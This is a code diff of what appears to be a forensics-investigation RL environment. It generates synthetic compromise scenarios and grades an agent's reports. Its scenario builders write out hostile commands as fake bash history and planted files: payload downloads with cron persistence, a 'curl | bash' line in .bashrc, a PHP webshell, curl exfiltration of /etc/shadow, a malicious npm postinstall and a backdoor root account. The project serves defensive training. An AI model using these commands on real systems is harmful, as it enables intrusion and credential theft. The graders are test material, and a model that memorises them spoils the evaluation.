| 29 |
+
# ---------------------------------------------------------------------------
|
| 30 |
+
|
| 31 |
+
def ssh_brute(ctx):
    """
    Build artifacts for pattern 1: SSH brute force -> wget payload -> cron
    persistence.

    Reads ``ctx.user``, ``ctx.ip``, ``ctx.host``, ``ctx.ts_base``, ``ctx.rng``,
    ``ctx.short``, ``ctx.backdoor_path`` and ``ctx.backdoor_bytes``.

    Returns a dict with keys ``pattern_tag``, ``auth_log_lines``,
    ``bash_history``, ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    ts = ctx.ts_base
    short = ctx.short

    def port():
        # One rng draw per log line, in line order.
        return ctx.rng.randint(30000, 65000)

    auth = [
        f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {port()} ssh2",
        f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {port()} ssh2",
        f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {port()} ssh2",
        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {port()} ssh2",
        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
        f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{short} /usr/local/bin/.{short}",
        f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{short}-sync",
    ]
    bash = (
        "cd /tmp\n"
        f"wget -q http://{ip}/payload/.{short}\n"
        f"chmod +x .{short}\n"
        f"sudo cp /tmp/.{short} /usr/local/bin/.{short}\n"
        f"echo '* * * * * root /usr/local/bin/.{short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{short}-sync\n"
        "history -c\n"
        "exit\n"
    )
    cron_path = f"/etc/cron.d/{short}-sync"
    cron_content = (
        "# Managed by deploy\n"
        "0 3 * * * root /usr/local/sbin/logrotate.sh\n"
        f"* * * * * root /usr/local/bin/.{short} >/dev/null 2>&1\n"
    )
    passwd_content = (
        "root:x:0:0:root:/root:/bin/bash\n"
        f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
        "sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n"  # attacker-added backdoor acct
    )
    modified_files = {
        "/etc/passwd": passwd_content,
        cron_path: cron_content,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
        {"phase": "recon", "detail": "whoami; id; uname -a"},
        {"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
        {"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
        {"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
    ]
    return dict(
        pattern_tag="ssh_brute",
        auth_log_lines=auth,
        bash_history=bash,
        modified_files=modified_files,
        modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
        timeline=timeline,
    )
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
# ---------------------------------------------------------------------------
|
| 86 |
+
# Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
|
| 87 |
+
# ---------------------------------------------------------------------------
|
| 88 |
+
|
| 89 |
+
def ssh_key_theft(ctx):
    """
    Build artifacts for pattern 2: stolen SSH key -> authorized_keys backdoor
    -> bashrc persistence.

    Reads ``ctx.user``, ``ctx.ip``, ``ctx.host``, ``ctx.ts_base``, ``ctx.rng``,
    ``ctx.backdoor_path`` and ``ctx.backdoor_bytes``.

    Returns a dict with keys ``pattern_tag``, ``auth_log_lines``,
    ``bash_history``, ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    ts = ctx.ts_base
    keys_path = f"/home/{user}/.ssh/authorized_keys"
    bashrc_path = f"/home/{user}/.bashrc"

    # Fake key fingerprint: 16 random hex characters drawn from ctx.rng.
    fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
    auth = [
        f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
        f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
    ]
    bash = (
        "cat ~/.ssh/authorized_keys\n"
        "echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
        f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
        "chmod 600 ~/.ssh/authorized_keys\n"
        "history -c\n"
    )
    authorized_keys = (
        f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
        "ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
    )
    bashrc = (
        "# ~/.bashrc\n"
        "alias ll='ls -la'\n"
        "export PATH=$PATH:/usr/local/bin\n"
        f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
    )
    modified_files = {
        keys_path: authorized_keys,
        bashrc_path: bashrc,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
        {"phase": "recon", "detail": "cat authorized_keys; env"},
        {"phase": "privesc", "detail": "already had sudo"},
        {"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
        {"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
    ]
    return dict(
        pattern_tag="ssh_key_theft",
        auth_log_lines=auth,
        bash_history=bash,
        modified_files=modified_files,
        modified_paths=[keys_path, bashrc_path, ctx.backdoor_path],
        timeline=timeline,
    )
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
# ---------------------------------------------------------------------------
|
| 143 |
+
# Pattern 3 — webshell upload -> php drop -> curl exfil
|
| 144 |
+
# ---------------------------------------------------------------------------
|
| 145 |
+
|
| 146 |
+
def webshell(ctx):
    """
    Pattern 3: password login, PHP webshell dropped into the web root, then
    /etc/shadow exfiltrated with curl.

    Args:
        ctx: scenario context; this function reads ``user``, ``ip``, ``host``,
            ``ts_base``, ``rng``, ``backdoor_path`` and ``backdoor_bytes``.

    Returns:
        dict with keys ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    ts = ctx.ts_base
    shell_path = "/var/www/html/shell.php"

    auth = [
        f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
        f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
    ]
    bash = (
        f"curl -sO http://{ip}/shell.php\n"
        "sudo mv shell.php /var/www/html/shell.php\n"
        "sudo chown www-data:www-data /var/www/html/shell.php\n"
        "curl -s http://localhost/shell.php?cmd=id\n"
        f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
        "history -c\n"
    )
    webshell_content = (
        b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
    )
    # If ctx.backdoor_path ever equals shell_path the backdoor payload wins,
    # exactly as before (later dict key overrides the earlier one).
    modified_files = {
        shell_path: webshell_content,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": "login", "detail": f"ssh from {ip}"},
        {"phase": "recon", "detail": "ls /var/www/html; id"},
        {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
        {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
        {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
    ]
    return dict(
        pattern_tag="webshell",
        auth_log_lines=auth,
        bash_history=bash,
        modified_files=modified_files,
        # Derive the path list from the dict keys so it stays unique and in
        # insertion order even when the two paths coincide.
        modified_paths=list(modified_files),
        timeline=timeline,
    )
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
# ---------------------------------------------------------------------------
|
| 190 |
+
# Pattern 4 — supply-chain compromised package -> /usr/lib drop
|
| 191 |
+
# ---------------------------------------------------------------------------
|
| 192 |
+
|
| 193 |
+
def supply_chain(ctx):
    """
    Pattern 4: a compromised npm package is installed globally with sudo and
    its postinstall script fetches and launches a payload under /tmp.

    Reads ``user``, ``ip``, ``host``, ``ts_base``, ``rng``, ``short``,
    ``backdoor_path`` and ``backdoor_bytes`` from ``ctx`` and returns the
    pattern dict (``pattern_tag``, ``auth_log_lines``, ``bash_history``,
    ``modified_files``, ``modified_paths``, ``timeline``).
    """
    account, source_ip, hostname = ctx.user, ctx.ip, ctx.host
    started = ctx.ts_base

    # RNG draw order matters for reproducibility: package first, then port.
    pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
    ssh_port = ctx.rng.randint(30000, 65000)

    login_line = (
        f"{_fmt_ts(started)} {hostname} sshd[901]: Accepted publickey for {account} "
        f"from {source_ip} port {ssh_port} ssh2"
    )
    sudo_line = (
        f"{_fmt_ts(started + timedelta(minutes=3))} {hostname} sudo: {account} : TTY=pts/0 ; "
        f"PWD=/home/{account} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}"
    )

    history_cmds = [
        f"npm view {pkg}",
        f"sudo npm install -g {pkg}",
        f"node -e 'require(\"{pkg}\")'",
        f"ls /usr/lib/node_modules/{pkg}/",
        "history -c",
    ]
    bash = "".join(cmd + "\n" for cmd in history_cmds)

    drop_target = f"/tmp/.{ctx.short}"
    script_path = f"/usr/lib/node_modules/{pkg}/postinstall.js"
    postinstall = (
        f"// postinstall.js -- dropped by malicious {pkg}\n"
        "const { exec } = require('child_process');\n"
        f"exec('curl -s http://{source_ip}/b -o {drop_target} && chmod +x {drop_target} && {drop_target} &');\n"
    )

    phases = (
        ("login", f"pubkey from {source_ip}"),
        ("recon", f"npm view {pkg}"),
        ("privesc", f"sudo npm install -g {pkg} runs postinstall as root"),
        ("persistence", f"{pkg} postinstall drops {drop_target}"),
        ("exfil", f"backdoor beacons to {source_ip}"),
    )

    return {
        "pattern_tag": "supply_chain",
        "auth_log_lines": [login_line, sudo_line],
        "bash_history": bash,
        "modified_files": {
            script_path: postinstall,
            ctx.backdoor_path: ctx.backdoor_bytes,
        },
        "modified_paths": [script_path, ctx.backdoor_path],
        "timeline": [{"phase": phase, "detail": detail} for phase, detail in phases],
    }
|
| 232 |
+
|
| 233 |
+
|
| 234 |
+
# ---------------------------------------------------------------------------
|
| 235 |
+
# Pattern 5 — insider threat: legit user exfiltrates db from internal network
|
| 236 |
+
# ---------------------------------------------------------------------------
|
| 237 |
+
|
| 238 |
+
def insider(ctx):
    """
    Pattern 5: a legitimate user dumps the database, stages the dump under
    /tmp/.staging and copies it off the host with scp.

    Args:
        ctx: scenario context; this function reads ``user``, ``ip``, ``host``,
            ``ts_base``, ``rng``, ``backdoor_path`` and ``backdoor_bytes``.

    Returns:
        dict with keys ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
        ``modified_paths`` holds each path exactly once.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    ts = ctx.ts_base
    # ctx.ip is used as-is; the scenario generator is what supplies an
    # internal (RFC 1918) address for this pattern.
    auth = [
        f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
        f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
    ]
    bash = (
        "sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
        "sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
        f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
        "rm /tmp/.staging/dump.sql\n"
        "history -c\n"
    )
    dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
    staging_content = b"-- staged copy\n" + dump_content
    modified_files = {
        "/var/lib/mysql/dump.sql": dump_content,
        "/tmp/.staging/dump.sql": staging_content,
    }
    # ctx.backdoor_path may be the staged-dump path itself (the generator's
    # _backdoor_path_for returns it for this pattern). The backdoor payload
    # must win in that case so the stored bytes match ctx.backdoor_bytes.
    modified_files[ctx.backdoor_path] = ctx.backdoor_bytes
    timeline = [
        {"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
        {"phase": "recon", "detail": "ls /var/lib/mysql"},
        {"phase": "privesc", "detail": "user already had sudo"},
        {"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
        {"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
    ]
    return dict(
        pattern_tag="insider",
        auth_log_lines=auth,
        bash_history=bash,
        modified_files=modified_files,
        # Take the paths from the dict keys: insertion-ordered and free of the
        # duplicate that a hand-written list produced when backdoor_path
        # coincided with the staged dump.
        modified_paths=list(modified_files),
        timeline=timeline,
    )
|
| 280 |
+
|
| 281 |
+
|
| 282 |
+
# Registry of attack-pattern builders, keyed by the pattern tag that callers
# pass in to select one.
PATTERNS = dict(
    ssh_brute=ssh_brute,
    ssh_key_theft=ssh_key_theft,
    webshell=webshell,
    supply_chain=supply_chain,
    insider=insider,
)
|
server/forensic_shell_environment.py
CHANGED
|
@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
|
|
| 11 |
|
| 12 |
import hashlib
|
| 13 |
import os
|
|
|
|
| 14 |
from typing import Dict, List, Optional, Tuple
|
| 15 |
from uuid import uuid4
|
| 16 |
|
| 17 |
from openenv.core.env_server.interfaces import Environment
|
| 18 |
-
from openenv.core.env_server.types import State
|
| 19 |
|
| 20 |
try:
|
| 21 |
from ..models import ForensicShellAction, ForensicShellObservation
|
|
@@ -24,14 +25,49 @@ except ImportError:
|
|
| 24 |
|
| 25 |
try:
|
| 26 |
from .grader import grade
|
|
|
|
| 27 |
from .scenarios import DEFAULT_TASK_ID, SCENARIOS
|
| 28 |
except ImportError:
|
| 29 |
-
from grader import grade
|
| 30 |
-
from
|
|
|
|
| 31 |
|
| 32 |
|
| 33 |
MAX_STEPS_PER_EPISODE = 30
|
| 34 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 35 |
|
| 36 |
def _as_bytes(content) -> bytes:
|
| 37 |
if isinstance(content, bytes):
|
|
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
|
|
| 68 |
self._fs: Dict[str, object] = {}
|
| 69 |
self._done: bool = False
|
| 70 |
self._steps_used: int = 0
|
|
|
|
|
|
|
|
|
|
| 71 |
|
| 72 |
# ---- episode lifecycle ---------------------------------------------------
|
| 73 |
|
| 74 |
def reset(
|
| 75 |
-
self,
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 76 |
) -> ForensicShellObservation:
|
| 77 |
-
|
| 78 |
-
|
| 79 |
-
|
| 80 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 81 |
|
| 82 |
-
self._task_id = chosen
|
| 83 |
-
self._scenario = SCENARIOS[chosen]
|
| 84 |
self._fs = dict(self._scenario["filesystem"])
|
| 85 |
self._done = False
|
| 86 |
self._steps_used = 0
|
|
|
|
|
|
|
|
|
|
| 87 |
self._state = State(episode_id=str(uuid4()), step_count=0)
|
| 88 |
|
| 89 |
return ForensicShellObservation(
|
|
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
|
|
| 142 |
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
|
| 143 |
|
| 144 |
if verb == "read_file":
|
| 145 |
-
|
| 146 |
-
|
|
|
|
|
|
|
| 147 |
|
| 148 |
if verb == "grep":
|
| 149 |
-
|
| 150 |
-
|
|
|
|
|
|
|
| 151 |
|
| 152 |
if verb == "stat":
|
| 153 |
out, err = self._do_stat(action.path or "")
|
|
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
|
|
| 173 |
reward=0.0,
|
| 174 |
)
|
| 175 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 176 |
# ---- action primitives ---------------------------------------------------
|
| 177 |
|
| 178 |
def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
|
|
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
|
|
| 284 |
metadata=meta,
|
| 285 |
)
|
| 286 |
|
| 287 |
-
# ---- state
|
| 288 |
|
| 289 |
@property
|
| 290 |
def state(self) -> State:
|
| 291 |
return self._state
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 11 |
|
| 12 |
import hashlib
|
| 13 |
import os
|
| 14 |
+
from pathlib import Path
|
| 15 |
from typing import Dict, List, Optional, Tuple
|
| 16 |
from uuid import uuid4
|
| 17 |
|
| 18 |
from openenv.core.env_server.interfaces import Environment
|
| 19 |
+
from openenv.core.env_server.types import EnvironmentMetadata, State
|
| 20 |
|
| 21 |
try:
|
| 22 |
from ..models import ForensicShellAction, ForensicShellObservation
|
|
|
|
| 25 |
|
| 26 |
try:
|
| 27 |
from .grader import grade
|
| 28 |
+
from .scenario_generator import generate_scenario
|
| 29 |
from .scenarios import DEFAULT_TASK_ID, SCENARIOS
|
| 30 |
except ImportError:
|
| 31 |
+
from grader import grade # type: ignore
|
| 32 |
+
from scenario_generator import generate_scenario # type: ignore
|
| 33 |
+
from scenarios import DEFAULT_TASK_ID, SCENARIOS # type: ignore
|
| 34 |
|
| 35 |
|
| 36 |
MAX_STEPS_PER_EPISODE = 30
|
| 37 |
|
| 38 |
+
# Exploration shaping reward — small positive reward the first time the agent
|
| 39 |
+
# reads one of the scenario's "canonical forensic artifacts" (auth.log, bash
|
| 40 |
+
# histories, cron files, backdoor path, etc.). Capped so the terminal grader
|
| 41 |
+
# reward always dominates the trajectory return.
|
| 42 |
+
SHAPING_REWARD_PER_READ = 0.02
|
| 43 |
+
SHAPING_REWARD_CAP = 0.10
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def _canonical_artifacts(scenario: dict) -> set:
|
| 47 |
+
"""
|
| 48 |
+
Pick out the set of paths in a scenario that a good investigator *should*
|
| 49 |
+
read. For hand-authored scenarios we use the ground-truth modified_files
|
| 50 |
+
plus a fixed set of classic forensic log paths. For generated scenarios we
|
| 51 |
+
also include the bash history of the compromised user.
|
| 52 |
+
"""
|
| 53 |
+
gt = scenario.get("ground_truth", {}) or {}
|
| 54 |
+
paths: set = set()
|
| 55 |
+
paths.update(gt.get("modified_files", []) or [])
|
| 56 |
+
for p in (
|
| 57 |
+
"/var/log/auth.log",
|
| 58 |
+
"/var/log/auth.log.1",
|
| 59 |
+
"/etc/passwd",
|
| 60 |
+
"/etc/shadow",
|
| 61 |
+
):
|
| 62 |
+
if p in scenario.get("filesystem", {}):
|
| 63 |
+
paths.add(p)
|
| 64 |
+
user = gt.get("compromised_user")
|
| 65 |
+
if user:
|
| 66 |
+
bh = f"/home/{user}/.bash_history"
|
| 67 |
+
if bh in scenario.get("filesystem", {}):
|
| 68 |
+
paths.add(bh)
|
| 69 |
+
return paths
|
| 70 |
+
|
| 71 |
|
| 72 |
def _as_bytes(content) -> bytes:
|
| 73 |
if isinstance(content, bytes):
|
|
|
|
| 104 |
self._fs: Dict[str, object] = {}
|
| 105 |
self._done: bool = False
|
| 106 |
self._steps_used: int = 0
|
| 107 |
+
self._useful_read: set = set() # paths already rewarded
|
| 108 |
+
self._shaping_total: float = 0.0 # running sum, capped at SHAPING_REWARD_CAP
|
| 109 |
+
self._canonical: set = set() # per-episode canonical artifact set
|
| 110 |
|
| 111 |
# ---- episode lifecycle ---------------------------------------------------
|
| 112 |
|
| 113 |
def reset(
|
| 114 |
+
self,
|
| 115 |
+
task_id: Optional[str] = None,
|
| 116 |
+
seed: Optional[int] = None,
|
| 117 |
+
difficulty: Optional[int] = None,
|
| 118 |
+
pattern: Optional[str] = None,
|
| 119 |
+
**kwargs,
|
| 120 |
) -> ForensicShellObservation:
|
| 121 |
+
"""
|
| 122 |
+
Load either a hand-authored scenario (by task_id) OR a procedurally
|
| 123 |
+
generated one (by seed+difficulty+pattern). If seed is given, generator
|
| 124 |
+
wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
|
| 125 |
+
"""
|
| 126 |
+
if seed is not None:
|
| 127 |
+
scenario = generate_scenario(
|
| 128 |
+
seed=int(seed),
|
| 129 |
+
difficulty=int(difficulty) if difficulty is not None else 3,
|
| 130 |
+
pattern=pattern,
|
| 131 |
+
)
|
| 132 |
+
self._task_id = scenario["task_id"]
|
| 133 |
+
self._scenario = scenario
|
| 134 |
+
else:
|
| 135 |
+
env_task = os.getenv("FORENSIC_TASK_ID")
|
| 136 |
+
chosen = task_id or env_task or DEFAULT_TASK_ID
|
| 137 |
+
if chosen not in SCENARIOS:
|
| 138 |
+
chosen = DEFAULT_TASK_ID
|
| 139 |
+
self._task_id = chosen
|
| 140 |
+
self._scenario = SCENARIOS[chosen]
|
| 141 |
|
|
|
|
|
|
|
| 142 |
self._fs = dict(self._scenario["filesystem"])
|
| 143 |
self._done = False
|
| 144 |
self._steps_used = 0
|
| 145 |
+
self._useful_read = set()
|
| 146 |
+
self._shaping_total = 0.0
|
| 147 |
+
self._canonical = _canonical_artifacts(self._scenario)
|
| 148 |
self._state = State(episode_id=str(uuid4()), step_count=0)
|
| 149 |
|
| 150 |
return ForensicShellObservation(
|
|
|
|
| 203 |
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
|
| 204 |
|
| 205 |
if verb == "read_file":
|
| 206 |
+
path = action.path or ""
|
| 207 |
+
out, err = self._do_read_file(path, action.max_bytes or 2048)
|
| 208 |
+
shaped = self._award_shaping(path) if err is None else 0.0
|
| 209 |
+
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
|
| 210 |
|
| 211 |
if verb == "grep":
|
| 212 |
+
path = action.path or ""
|
| 213 |
+
out, err = self._do_grep(action.pattern or "", path)
|
| 214 |
+
shaped = self._award_shaping(path) if err is None else 0.0
|
| 215 |
+
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
|
| 216 |
|
| 217 |
if verb == "stat":
|
| 218 |
out, err = self._do_stat(action.path or "")
|
|
|
|
| 238 |
reward=0.0,
|
| 239 |
)
|
| 240 |
|
| 241 |
+
# ---- shaping reward -----------------------------------------------------
|
| 242 |
+
|
| 243 |
+
def _award_shaping(self, path: str) -> float:
    """
    Compute the exploration bonus for touching ``path``.

    A bonus is paid only the first time a path from the per-episode canonical
    set is touched, and only while the running total is still below
    SHAPING_REWARD_CAP. The final grant is clipped so the total never exceeds
    the cap. Returns 0.0 in every other case.
    """
    first_touch = (
        bool(path)
        and path in self._canonical
        and path not in self._useful_read
    )
    # Small epsilon absorbs float drift from repeated additions.
    cap_reached = self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP
    if not first_touch or cap_reached:
        return 0.0

    self._useful_read.add(path)
    headroom = SHAPING_REWARD_CAP - self._shaping_total
    bonus = SHAPING_REWARD_PER_READ if SHAPING_REWARD_PER_READ <= headroom else headroom
    self._shaping_total += bonus
    return float(bonus)
|
| 259 |
+
|
| 260 |
# ---- action primitives ---------------------------------------------------
|
| 261 |
|
| 262 |
def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
|
|
|
|
| 368 |
metadata=meta,
|
| 369 |
)
|
| 370 |
|
| 371 |
+
# ---- state + metadata ----------------------------------------------------
|
| 372 |
|
| 373 |
@property
def state(self) -> State:
    """Return the State object held by this environment (reset() installs a fresh one per episode)."""
    return self._state
|
| 376 |
+
|
| 377 |
+
def get_metadata(self) -> EnvironmentMetadata:
    """
    Build the metadata served for this environment: a real name, description,
    embedded README, version, author and docs URL.

    The README is looked up one directory above this module. Embedding it is
    best-effort: if the file is missing, unreadable, or not valid UTF-8,
    ``readme_content`` is left as ``None`` instead of failing the call.
    """
    readme_path = Path(__file__).resolve().parent.parent / "README.md"
    readme_content: Optional[str]
    try:
        # Read directly rather than checking exists() first: a missing file
        # raises FileNotFoundError, which is an OSError.
        readme_content = readme_path.read_text(encoding="utf-8")
    except (OSError, UnicodeDecodeError):
        readme_content = None
    return EnvironmentMetadata(
        name="ForensicShell",
        description=(
            "Digital-forensics investigation environment for OpenEnv RL. The "
            "agent reads logs, hashes backdoors, and reconstructs attacker "
            "kill-chains across 5 attack patterns and 5 difficulty tiers. "
            "Procedural scenarios via deterministic seeds; deterministic "
            "graders return rewards in [0, 1] with partial credit (Jaccard, "
            "F1, Kendall-tau)."
        ),
        readme_content=readme_content,
        version="0.2.0",
        author="yashppawar",
        documentation_url="https://huggingface.co/spaces/yashppawar/forensic-shell",
    )
|
server/grader.py
CHANGED
|
@@ -122,9 +122,26 @@ GRADERS = {
|
|
| 122 |
}
|
| 123 |
|
| 124 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 125 |
def grade(task_id: str, report: Dict, truth: Dict) -> float:
|
| 126 |
"""Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
|
| 127 |
-
|
|
|
|
|
|
|
|
|
|
| 128 |
if fn is None:
|
| 129 |
return 0.0
|
| 130 |
score = fn(report or {}, truth or {})
|
|
|
|
| 122 |
}
|
| 123 |
|
| 124 |
|
| 125 |
+
def _grade_generic(report: Dict, truth: Dict) -> float:
    """
    Grade a procedurally generated scenario.

    The sub-grader is selected purely from the keys present in ``truth``, so
    this function never needs to know the task_id: a ``timeline`` key selects
    the timeline grader, otherwise a ``backdoor_sha256`` key selects the
    modified-files grader, otherwise the login grader is used.
    """
    if "timeline" in truth:
        grader = _grade_t3_timeline
    elif "backdoor_sha256" in truth:
        grader = _grade_t2_modified
    else:
        grader = _grade_t1_login
    return grader(report, truth)
|
| 137 |
+
|
| 138 |
+
|
| 139 |
def grade(task_id: str, report: Dict, truth: Dict) -> float:
|
| 140 |
"""Dispatch to the right grader for this task. Returns float in [0.0, 1.0]."""
|
| 141 |
+
if task_id and task_id.startswith("gen_"):
|
| 142 |
+
fn = _grade_generic
|
| 143 |
+
else:
|
| 144 |
+
fn = GRADERS.get(task_id)
|
| 145 |
if fn is None:
|
| 146 |
return 0.0
|
| 147 |
score = fn(report or {}, truth or {})
|
server/name_pools.py
ADDED
|
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Deterministic pools used by scenario_generator.py to sample usernames, hostnames,
|
| 3 |
+
and IP addresses. Everything public-facing lives in RFC 5737 documentation ranges so
|
| 4 |
+
the synthetic data can never collide with real production IPs.
|
| 5 |
+
"""
|
| 6 |
+
|
| 7 |
+
# 30 common first names + 10 IT-flavored accounts (40 total). Excludes 'root' from the compromise
|
| 8 |
+
# target pool because it's structurally weird ("root was compromised via ssh brute")
|
| 9 |
+
